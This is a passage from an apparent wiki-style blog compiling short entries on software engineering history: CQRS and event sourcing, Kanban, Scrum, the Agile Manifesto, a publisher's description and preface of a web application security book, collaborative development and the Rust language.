of Domain-specific languages.Domain-specific language (DSL)DDD does not specifically require the use of a DSL, though it could be used to help define a DSL and support methods like domain-specific multimodeling.Aspect-oriented programming (AOP)AOP makes it easy to factor out technical concerns (such as security, transaction management, logging) from a domain model, and as such makes it easier to design and implement domain models that focus purely on the business logic.Command Query Responsibility Segregation (CQRS)CQRS is an architectural pattern for separation of reads from writes, where the former is a Query and the latter is a Command. Commands mutate state and are hence approximately equivalent to method invocation on aggregate roots/entities. Queries read state but do not mutate it. CQRS is a derivative architectural pattern from the design pattern called Command and Query Separation (CQS) which was coined by Bertrand Meyer. While CQRS does not require DDD, domain-driven design makes the distinction between commands and queries explicit, around the concept of an aggregate root. The idea is that a given aggregate root has a method that corresponds to a command and a command handler invokes the method on the aggregate root. The aggregate root is responsible for performing the logic of the operation and yielding either a number of events or a failure (exception or execution result enumeration/number) response OR (if Event Sourcing (ES) is not used) just mutating its state for a persister implementation such as an ORM to write to a data store, while the command handler is responsible for pulling in infrastructure concerns related to the saving of the aggregate root’s state or events and creating the needed contexts (e.g. transactions).Event Sourcing (ES)An architectural pattern which warrants that your entities (as per Eric Evans’ definition) do not track their internal state by means of direct serialization or O/R mapping, but by means of reading and committing events to an event store. Where ES is combined with CQRS and DDD, aggregate roots are responsible for thoroughly validating and applying commands (often by means having their instance methods invoked from a Command Handler), and then publishing a single or a set of events which is also the foundation upon which the aggregate roots base their logic for dealing with method invocations. Hence, the input is a command and the output is one or many events which are transactionally (single commit) saved to an event store, and then often published on a message broker for the benefit of those interested (often the views are interested; they are then queried using Query-messages). When modeling your aggregate roots to output events, you can isolate the internal state even further than would be possible when projecting read-data from your entities, as is done in standard n-tier data-passing architectures. One significant benefit from this is that tooling such as axiomatic theorem provers (e.g. Microsoft Contracts and CHESS[5]) are easier to apply, as the aggregate root comprehensively hides its internal state. Events are often persisted based on the version of the aggregate root instance, which yields a domain model that synchronizes in distributed systems around the concept of optimistic concurrency.

Fair Use Sources:

Categories
Cloud DevOps History Software Engineering

Kanban Software Development

Return to Timeline of the History of Computers, Networking

Kanban (Japanese 看板, signboard or billboard) is a lean method to manage and improve work across human systems. This approach aims to manage work by balancing demands with available capacity, and by improving the handling of system-level bottlenecks.

Work items are visualized to give participants a view of progress and process, from start to finish—usually via a Kanban board. Work is pulled as capacity permits, rather than work being pushed into the process when requested.

In knowledge work and in software development, the aim is to provide a visual process management system which aids decision-making about what, when, and how much to produce. The underlying Kanban method originated in lean manufacturing,[1] which was inspired by the Toyota Production System.[2] Kanban is commonly used in software development in combination with other methods and frameworks such as Scrum.[3]

Fair Use Sources:

Categories
Cloud DevOps History Software Engineering

Scrum Software Development

Return to Timeline of the History of Computers, Networking

Scrum is an agile framework for developing, delivering, and sustaining complex products,[1] with an initial emphasis on software development, although it has been used in other fields including research, sales, marketing and advanced technologies.[2] It is designed for teams of ten or fewer members, who break their work into goals that can be completed within timeboxed iterations, called sprints, no longer than one month and most commonly two weeks. The Scrum Team track progress in 15-minute time-boxed daily meetings, called daily scrums. At the end of the sprint, the team holds sprint review, to demonstrate the work done, and sprint retrospective to improve continuously.

Fair Use Sources:

Categories
Cloud DevOps DevSecOps-Security-Privacy History Software Engineering

Agile Software Development

Return to Timeline of the History of Computers, Networking

Agile Software Development – “Agile software development — also referred to simply as Agile — is a type of development methodology that anticipates the need for flexibility and applies a level of pragmatism to the delivery of the finished product.”

Fair Use Source: 809137

In software developmentagile (sometimes written Agile)[1] practices approach discovering requirements and developing solutions through the collaborative effort of self-organizing and cross-functional teams and their customer(s)/end user(s).[2] It advocates adaptive planning, evolutionary development, early delivery, and continual improvement, and it encourages flexible responses to change.[3][4][further explanation needed]

It was popularized by the Manifesto for Agile Software Development.[5] The values and principles espoused in this manifesto were derived from and underpin a broad range of software development frameworks, including Scrum and Kanban.[6][7]

While there is much anecdotal evidence that adopting agile practices and values improves the agility of software professionals, teams and organizations, the empirical evidence is mixed and hard to find.[8][9]

The Manifesto for Agile Software Development

Agile software development values

Based on their combined experience of developing software and helping others do that, the seventeen signatories to the manifesto proclaimed that they value:[5]

  • Individuals and interactions over processes and tools
  • Working software over comprehensive documentation
  • Customer collaboration over contract negotiation
  • Responding to change over following a plan

That is to say, the items on the left are valued more than the items on the right.

As Scott Ambler elucidated:[21]

  • Tools and processes are important, but it is more important to have competent people working together effectively.
  • Good documentation is useful in helping people to understand how the software is built and how to use it, but the main point of development is to create software, not documentation.
  • A contract is important but is no substitute for working closely with customers to discover what they need.
  • A project plan is important, but it must not be too rigid to accommodate changes in technology or the environment, stakeholders’ priorities, and people’s understanding of the problem and its solution.

Some of the authors formed the Agile Alliance, a non-profit organization that promotes software development according to the manifesto’s values and principles. Introducing the manifesto on behalf of the Agile Alliance, Jim Highsmith said,

The Agile movement is not anti-methodology, in fact many of us want to restore credibility to the word methodology. We want to restore a balance. We embrace modeling, but not in order to file some diagram in a dusty corporate repository. We embrace documentation, but not hundreds of pages of never-maintained and rarely-used tomes. We plan, but recognize the limits of planning in a turbulent environment. Those who would brand proponents of XP or SCRUM or any of the other Agile Methodologies as “hackers” are ignorant of both the methodologies and the original definition of the term hacker.— Jim Highsmith, History: The Agile Manifesto[22]

Agile software development principles

The Manifesto for Agile Software Development is based on twelve principles:[23]

  1. Customer satisfaction by early and continuous delivery of valuable software.
  2. Welcome changing requirements, even in late development.
  3. Deliver working software frequently (weeks rather than months)
  4. Close, daily cooperation between business people and developers
  5. Projects are built around motivated individuals, who should be trusted
  6. Face-to-face conversation is the best form of communication (co-location)
  7. Working software is the primary measure of progress
  8. Sustainable development, able to maintain a constant pace
  9. Continuous attention to technical excellence and good design
  10. Simplicity—the art of maximizing the amount of work not done—is essential
  11. Best architectures, requirements, and designs emerge from self-organizing teams
  12. Regularly, the team reflects on how to become more effective, and adjusts accordingly

Fair Use Sources:

Categories
DevSecOps-Security-Privacy Software Engineering

Application Security Engineer

Application security engineer: “Sometimes called a “product security engineer” — a software engineer whose role is to evaluate and improve the security of an organization’s codebase and application architecture.” (B085FW7J86)

Fair Use Sources:

B085FW7J86

Categories
Bibliography Cloud DevSecOps-Security-Privacy JavaScript Software Engineering

Web Application Security – Exploitation and Countermeasures for Modern Web Applications

Return to Timeline of the History of Computers

Fair Use Source: B085FW7J86

By Andrew Hoffman

While many resources for network and IT security are available, detailed knowledge regarding modern web application security has been lacking—until now. This practical guide provides both offensive and defensive security concepts that software engineers can easily learn and apply.

Andrew Hoffman, a senior security engineer at Salesforce, introduces three pillars of web application security: recon, offense, and defense. You’ll learn methods for effectively researching and analyzing modern web applications—including those you don’t have direct access to. You’ll also learn how to break into web applications using the latest hacking techniques. Finally, you’ll learn how to develop mitigations for use in your own web applications to protect against hackers.

  • Explore common vulnerabilities plaguing today’s web applications
  • Learn essential hacking techniques attackers use to exploit applications
  • Map and document web applications for which you don’t have direct access
  • Develop and deploy customized exploits that can bypass common defenses
  • Develop and deploy mitigations to protect your applications against hackers
  • Integrate secure coding best practices into your development lifecycle
  • Get practical tips to help you improve the overall security of your web applications

From the Preface

Web Application Security walks you through a number of techniques used by talented hackers and bug bounty hunters to break into applications, then teaches you the techniques and processes you can implement in your own software to protect against such hackers.

This book is designed to be read from cover to cover, but can also be used as an on-demand reference for particular types of recon techniques, attacks, and defenses against attacks. Ultimately, this book is written to aid the reader in becoming better at web application security in a way that is practical, hands-on, and follows a logical progression such that no significant prior security experience is required.

Prerequisite Knowledge and Learning Goals

This is a book that will not only aid you in learning how to defend your web application against hackers, but will also walk you through the steps hackers take in order to investigate and break into a web application. Throughout this book we will discuss many techniques that hackers are using today to break into web applications hosted by corporations, governments, and occasionally even hobbyists. Following sufficient investigation into the previously mentioned techniques, we begin a discussion on how to secure web applications against these hackers.

In doing so you will discover brand new ways of thinking about application architecture. You will also learn how to integrate security best practices into an engineering organization. Finally, we will evaluate a number of techniques for defending against the most common and dangerous types of attacks that occur against web applications today.

After completing Web Application Security you will have the required knowledge to perform recon techniques against applications you do not have code-level access to. You will also be able to identify threat vectors and vulnerabilities in web applications, and craft payloads designed to compromise application data, interrupt execution flow, or interfere with the intended function of a web application. With these skills in hand, and the knowledge gained from the final section on securing web applications, you will be able to identify risky areas of a web application’s codebase and understand how to write code to defend against attacks that would otherwise leave your application and its users at risk.

Suggested Background

The potential audience for this book is quite broad, but the style in which the book is written and how the examples are structured should make it ideal for anyone with an intermediary-level background in software engineering.

Minimum Required Skills

In this book, an “intermediary-level background in software engineering” implies the following:

  • You can write basic CRUD (create, read, update, delete) programs in at least one programming language.
  • You can write code that runs on a server somewhere (such as backend code).
  • You can write at least some code that runs in a browser (frontend code, usually JavaScript).
  • You know what HTTP is, and can make, or at least read, GET/POST calls over HTTP in some language or framework.
  • You can write, or at least read and understand, applications that make use of both server-side and client-side code, and communicate between the two over HTTP.
  • You are familiar with at least one popular database (MySql, MongoDB, etc.).

These skills represent the minimum criteria for successfully following the examples in this book. Any experience you have beyond these bullet points is a plus and will make this book that much easier for you to consume and derive educational value from.

About the Author

Andrew Hoffman is a senior product security engineer at Salesforce.com, where he is responsible for the security of multiple JavaScript, NodeJS, and OSS teams. His expertise is in deep DOM and JavaScript security vulnerabilities. He has worked with every major browser vendor, as well as with TC39 and WHATWG ? the organizations responsible for the upcoming version of JavaScript and the browser DOM spec.
Prior to this role, Andrew was a software security engineer working on Locker Service, the world’s first JavaScript namespace isolation library that operates from the interpreter level up. In parallel, Andrew also contributed to the upcoming JavaScript language security feature “Realms,” which provides language level namespace isolation to JavaScript.

Product details:

  • Publication date : March 2, 2020
  • Print length : 331 pages
  • Publisher : O’Reilly Media; 1st edition (March 2, 2020)
  • ASIN : B085FW7J86

Who Benefits Most from Reading This Book?

Prerequisite skills aside, I believe it is important to clarify who will benefit from this book the most, so I’d like to explain who my target audience is. To do so I have structured this section in terms of learning goals and professional interests. If you don’t fit into one of the following categories, you can still learn many valuable or at least interesting concepts from this book.

This book was written to stand the test of time, so if you decide later on to pursue one of the occupations in its target audience, all of the knowledge from this book should still be relevant.

Software Engineers and Web Application Developers

I believe it would be fair to say that the primary audience for this book is an early- to mid-career software engineer or web application developer. Ideally, this reader is interested in gaining a deep understanding of either offensive techniques used by hackers, or defensive techniques used by security engineers to defend against hackers.

Often the titles “web application developer” and “software engineer” are interchangeable, which might lead to a bit of confusion considering I use both of them throughout the upcoming chapters. Let’s start off with some clarification.

Software engineers

In my mind, and for the sake of clarity, when I use the term “software engineer,” I am referring to a generalist who is capable of writing software that runs on a variety of platforms. Software engineers will benefit from this book in several ways.

First off, much of the knowledge contained in this book is transferable with minimal effort to software that does not run on the web. It is also transferable to other types of networked applications, with native mobile applications being the first that come to mind.

Furthermore, several exploits discussed in this book take advantage of server-side integrations involving communication with a web application and another software component. As a result, it is safe to consider any software that interfaces with a web application as a potential threat vector (databases, CRM, accounting, logging tools, etc.).

Web application developers

On the other hand, a “web application developer” by my definition is someone who is highly specialized in writing software that runs on the web. They are often further subdivided into frontend, backend, and full stack developers.

Historically, many attacks against web applications have targeted server-side vulnerabilities. As a result I believe this book’s use case for a backend or full stack developer is very transparent and easily understood.

I also believe this book should be valuable for other types of web application developers, including those who do not write code that runs on a server but instead runs on a web browser (frontend/JavaScript developers).

As I explain in the upcoming chapters, many of the ways in which hackers take advantage of today’s web applications originate via malicious code running in the browser. Some hackers are even taking advantage of the browser DOM or CSS stylesheets in order to attack an application’s users.

These points suggest that it is also important for frontend developers who do not write server-side code to be aware of the security risks their code may expose and how to mitigate those risks.

General Learning Goals

This book should be a fantastic resource for any of the preceding looking to make a career change to a more security-oriented role. It will also be valuable for those looking to learn how to beef up the defenses in their own code or in the code maintained by their organization.

If you want to defend your application against very specific exploits, this book is also for you. This book follows a unique structure, which should enable you to use it as a security reference without ever having to read any of the chapters that involve hacking. That is, of course, if that is your only goal in purchasing this book.

I would suggest reading from cover to cover for the best learning experience, but if you are looking only for a reference on securing against specific types of hacks, just flip the book halfway open and get started reading.

Security Engineers, Pen Testers, and Bug Bounty Hunters

As a result of how this book is structured, it can also be used as a resource for penetration testing, bug bounty hunting, and any other type of application-level security work. If this type of work is relevant or interesting to you, then you may find the first half of the book more to your liking.

This book will take a deep dive into how exploits work from both a code level and an architectural level rather than simply executing well-known open source software (OSS) scripts or making use of paid security automation software. Because of this there is a second audience for this book — software security engineers, IT security engineers, network security engineers, penetration testers, and bug bounty hunters.

Tip

Want to make a little bit of extra money on the side while developing your hacking skills? Read this book and then sign up for one of the bug bounty programs noted in Part III. This is a great way to help other companies improve the security of their products while developing your hacking skills and making some additional cash.

This book will be very beneficial to existing security professionals who understand conceptually how many attacks work but would like a deep dive into the systems and code behind a tool or script.

In today’s security world, it is commonplace for penetration testers to operate using a wide array of prebuilt exploit scripts. This has led to the creation of many paid and open source tools that automate classic attacks, and attacks that can be easily run without deep knowledge regarding the architecture of an application or the logic within a particular block of code.

The exploits and countermeasures contained within this book are presented without the use of any specialized tools. Instead, we will rely on our own scripts, network requests, and the tooling that comes standard in Unix-based operating systems, as well as the standard tooling present in the three major web browsers (Chrome, Firefox, and Edge).

This is not to take away from the value of specialized security tools. In fact, I think that many of them are exceptional and make delivering professional, high-quality penetration tests much easier!

Instead, the reason this book does not contain the use of specialized security tools is so that we can focus on the most important parts of finding a vulnerability, developing an exploit, prioritizing data to compromise, and making sure you can defend against all of the above. As a result, I believe that by the end of this book you will be prepared to go out into the wild and find new types of vulnerabilities, develop exploits against systems that have never been exploited before, and harden the most complex systems against the most persistent attackers.

How Is This Book Organized?

You will soon find that this book is structured quite differently than most other technology books out there. This is intentional. This book is purposefully structured so that there is a nearly 1:1 ratio of chapters regarding hacking (offense) and security (defense).

After beginning our adventure with a bit of a history lesson and some exploration into the technology, tools, and exploits of the past, we will move on to our main topic: exploitation and countermeasures for modern web applications. Hence the subtitle of this book.

The main content in this book is structured into three major parts, with each part containing many individual chapters covering a wide array of topics. Ideally, you will venture through this book in a linear fashion, from page one all the way to the final page. Reading this book in that order will provide the greatest learning possible. As mentioned earlier, this book can also be used as either a hacking reference or a security engineering reference by focusing on the first or second half, respectively.

By now you should understand how to navigate the book, so let’s go over the three main parts of this book so we can grasp the importance of each.

Recon

The first part of this book is “Recon,” where we evaluate ways to gain information regarding a web application without necessarily trying to hack it.

In “Recon,” we discuss a number of important technologies and concepts that are essential to master if you wish to become a hacker. These topics will also be important to anyone looking to lock down an existing application, because the information exposed by many of these techniques can be mitigated with appropriate planning.

I have had the opportunity to work with what I believe to be some of the best penetration testers and bug bounty hunters in the world. Through my conversations with them and my analysis of how they do their work, I’ve come to realize this topic is much more important than many other books make it out to be.

Why is recon important?

I would go so far as to say that for many of the top bug bounty hunters in the world, expert-level reconnaissance ability is what differentiates these “great” hackers from simply “good” hackers.

In other words, it’s one thing to have a fast car (in this case, perhaps knowing how to build exploits), but without knowing the most efficient route to the finish line, you may not win the race. A slower car could make it to the finish line in less time than a fast one if a more efficient path is taken.

If fantasy-based analogies hit closer to home, you could think of recon skills as something akin to a rogue in an RPG. In our case, the rogue’s job isn’t to do lots of damage, but instead to scout ahead of the group and circle back with intel. It’s the guy who helps line up the shots and figures out which battles will have the greatest rewards.

The last part in particular is exceedingly valuable, because it’s likely many types of attacks could be logged against well-defended targets. This means you might only get one chance to exploit a certain software hole before it is found and closed.

We can safely conclude that the second use of reconnaissance is figuring out how to prioritize your exploits.

If you are interested in a career as a penetration tester or a bug bounty hunter, this part of the book will be of utmost importance to you. This is largely because in the world of bug bounty hunting, and to a lesser extent penetration testing, tests are performed “black box” style. “Black box” testing is a style of testing where the tester has no knowledge of the structure and code within an app, and hence must build their own understanding of the application through careful analysis and investigation.

Offense

The second part of this book is “Offense.” Here the focus of the book moves from recon and data gathering to analyzing code and network requests. Then with this knowledge we will attempt to take advantage of insecurely written or improperly configured web applications.

Warning

A number of chapters in this book explain actual hacking techniques used by malicious black hat hackers in the real world. It is imperative that if you are testing techniques found in this book, you do so only against an application that you own or have explicit written permission to test exploits against.

Improper usage of the hacking techniques presented in this book could result in fines, jail time, etc., depending on your country’s laws on hacking activity.

In Part II, we learn how to both build and deploy exploits. These exploits are designed to steal data or forcibly change the behavior of an application.

This part of the book builds on the knowledge from Part I, “Recon.” Using our previously acquired reconnaissance skills in conjunction with newly acquired hacking skills, we will begin taking over and attacking demo web applications.

Part II is organized on an exploit-by-exploit basis. Each chapter explains in detail a different type of exploit.

These chapters start with an explanation of the exploit itself so you can understand how it works mechanically. Then we discuss how to search for vulnerabilities where this exploit can be applied. Finally, we craft a payload specific to the demo application we are exploiting. We then deploy the payload, and observe the results.

Vulnerabilities considered in depth

Cross-Site Scripting (XSS), one of the first exploits we dig into, is a type of attack that works against a wide array of web applications, but can be applied to other applications as well (e.g., mobile apps, flash/ActionScript games, etc.). This particular attack involves writing some malicious code on your own machine, then taking advantage of poor filtration mechanisms in an app that will allow your script to execute on another user’s machine.

When we discuss an exploit like an XSS attack, we will start with a vulnerable app. This demo app will be straightforward and to the point, ideally just a few paragraphs of code. From this foundation, we will write a block of code to be injected as a payload into the demo app, which will then take advantage of a hypothetical user on the other side.

Sounds simple doesn’t it? And it should be. Without any defenses, most software systems are easy to break into. As a result, with an exploit like XSS where there are many defenses, we will progressively dig deeper and deeper into the specifics of writing and deploying an attack.

We will initially attempt to break down routine defenses and eventually move on to bypassing more advanced defense mechanisms. Remember, just because someone built a wall to defend their codebase doesn’t mean you can’t go over it or underneath it. This is where we will get to use some creativity and find some unique and interesting solutions.

Part II is important because understanding the mindset of a hacker is often vital for architecting secure codebases. It is exceptionally important for any reader interested in hacking, penetration testing, or bug bounty hunting.

Defense

The third and final part of this book, “Defense,” is about securing your own code against hackers. In Part III, we go back and look at every type of exploit we covered in Part II and attempt to consider them again with a completely opposite viewpoint. This time, we will not be concentrating on breaking into software systems, but instead attempting to prevent or mitigate the probability that a hacker could break into our systems.

In Part III you will learn how to protect against specific exploits from Part II, in addition to learning general protections that will secure your codebase against a wide variety of attacks. These general protections range from “secure by default” engineering methodologies, to secure coding best practices that can be enforced easily by an engineering team using tests and other simple automated tooling (such as a linter).

Beyond learning how to write more secure code, you will also learn a number of increasingly valuable tricks for catching hackers in the act and improving your organization’s attitude toward software security.

Most chapters in Part III restructured somewhat akin to the hacking chapters in Part II. We begin with an overview of the technology and skills required as we begin preparing a defense against a specific type of attack.

Initially we will prepare a basic-level defense, which should help mitigate attacks but may not always fend off the most persistent hackers. Finally, we will improve our defenses to the point where most, if not all, hacking attempts will be stopped.

At this point, the structure of Part III begins to differ from that of Part II as we discuss trade-offs that result from improving application security. Generally speaking, all measures of improving security will have some type of trade-off outside of security. It may not be your place to make suggestions on what level of risk should be accepted at the cost of your product, but you should be aware of the trade-offs being made.

Often, these trade-offs come in the form of application performance. The more efforts you take to read and sanitize data, the more operations are performed outside of the standard functionality of your application. Hence a secure feature typically requires more computing resources than an insecure feature.

With further operations also comes more code, which means more maintenance, tests, and engineering time. This development overhead to security often comes in the form of logging or monitoring overhead as well.

Finally, some security precautions will come at the cost of reduced usability.

Trade-off evaluation

A very simple example of this process of comparing security benefits to their cost, in terms of usability and performance, is a login form. If an error message for an invalid username is displayed to the user when attempting to log in, it becomes significantly easier for a hacker to brute force username/password combinations. This occurs because the hacker no longer has to find a list of active login usernames, as the application will confirm a user account. The hacker simply needs to successfully brute force a few usernames, which can be confirmed and logged for later break-in attempts.

Next, the hacker only needs to brute force passwords rather than username/password combinations, which implies significantly decreased mathematical complexity and takes much less time and resources.

Furthermore, if the application uses an email and password scheme for login rather than a username and password scheme, then we have another problem. A hacker can use this login form to find valid email addresses that can be sold for marketing or spam purposes. Even if precautions are taken to prevent brute forcing, carefully crafted inputs (e.g., first.last@company.com, firstlast@company.com, firstl@company.com) can allow the hacker to reverse engineer the schema used for company email accounts and pinpoint the valid accounts of execs for sales or individuals with important access criteria for phishing.

As a result, it is often considered best practice to provide more generic error messages to the user. Of course, this change conflicts with the user experience because more specific error messages are definitely ideal for the usability of your application.

This is a great example of a trade-off that can be made for improved application security, but at the cost of reduced usability. This should give you an idea of the type of trade-offs that are discussed in Part III of this book.

This part of the book is extremely important for any security engineer who wants to beef up their skills, or any software engineer looking at transitioning to a security engineering role. The information presented here will help in architecting and writing more secure applications.

As in Part II, understanding how an application’s security can be improved is a valuable asset for any type of hacker. This is because while routine defenses can often be easily bypassed, more complex defenses require deeper understanding and knowledge to bypass. This is further evidence as to why I suggest reading the book from start to finish.

Although some parts of this book may give you more valuable learning than others, depending on your goals, I doubt any of it will be wasted. Cross-training of this sort is particularly valuable, as each part of the book is just another perspective on the same puzzle.

Categories
History Software Engineering

Collaborative Programming and Software Development – 1999 AD

Return to Timeline of the History of Computers

1999

Collaborative Software Development

“Despite the reputation of software developers as solitary, introverted people, much of their time is spent socializing and collaborating with colleagues and like-skilled experts to solve common problems or work on common projects. By the late 1990s, a combination of factors led to the emergence of collaborative development environments (CDEs), wherein geographically dispersed developers, some connected by corporations, others simply by challenges, would collaborate in virtual space using a variety of features to advance open source projects and develop code.

As software development efforts for web-based platforms grew, so did the need for greater productivity and innovation in meeting the growing demands of these systems and their ever-changing requirements. CDEs evolved in part to meet these demands and to help coders realize the network effects of leveraging expertise and social engagement beyond one’s own community or organization. The company that led the charge in this era was SourceForge®, a free service for software developers to manage their code development that came on the scene in 1999. A number of other platforms entered the market soon after.

Collaborative software development has dramatically accelerated the pace of developing open source projects. Without these capabilities, the rate of evolution would have been much slower, and without the benefit of as many perspectives and diverse inputs, the quality would not be nearly so high. One example of this is the Apache Software Foundation’s big data software stack, including Hadoop, Apache Spark, and others—which was collaboratively developed by programmers at dozens of different corporations and universities. In large part, the success and vibrancy of these projects is measured not just by their adoption but also by the number of active developers who are improving the code base.

Over time, CDEs incorporated additional features into their platforms beyond simple version control, including threaded discussion forums, calendaring and scheduling, electronic document routing and workflow, projects dashboards, and configuration control of shared artifacts, among others.”

SEE ALSO: GNU Manifesto (1985), Wikipedia (2001)

Services like SourceForge and GitHub make it possible for many people to work on the same piece of software at the same time, dramatically increasing the rate of software innovation.

Fair Use Sources: B07C2NQSPV

Brown, A. W., and Grady Booch. “Collaborative Development Environments.” Advances in Computers 53 (June 2003): 1–29.

Categories
History Software Engineering

Rust Programming Language Invented by Graydon Hoare of Mozilla – 2010 AD

Return to Timeline of the History of Computers

Graydon Hoare started development of the Rust programming language around 2010. After contributions from hundreds of people, it was officially released as version 1.0.0 alpha by Mozilla research on January 9, 2015.

Rust is a multi-paradigm programming language designed for performance and safety, especially safe concurrency.[16][17] Rust is syntactically similar to C++,[18] but can guarantee memory safety by using a borrow checker to validate references.[19] Rust achieves memory safety without garbage collection, and reference counting is optional.[20][21]

Rust was originally designed by Graydon Hoare at Mozilla Research, with contributions from Dave Herman, Brendan Eich, and others.[22][23] The designers refined the language while writing the Servo layout or browser engine,[24] and the Rust compiler. It has gained increasing use in industry, and Microsoft has been experimenting with the language for secure and safety-critical software components.[25][26]

Rust has been voted the “most loved programming language” in the Stack Overflow Developer Survey every year since 2016.[27]

Fair Use Sources: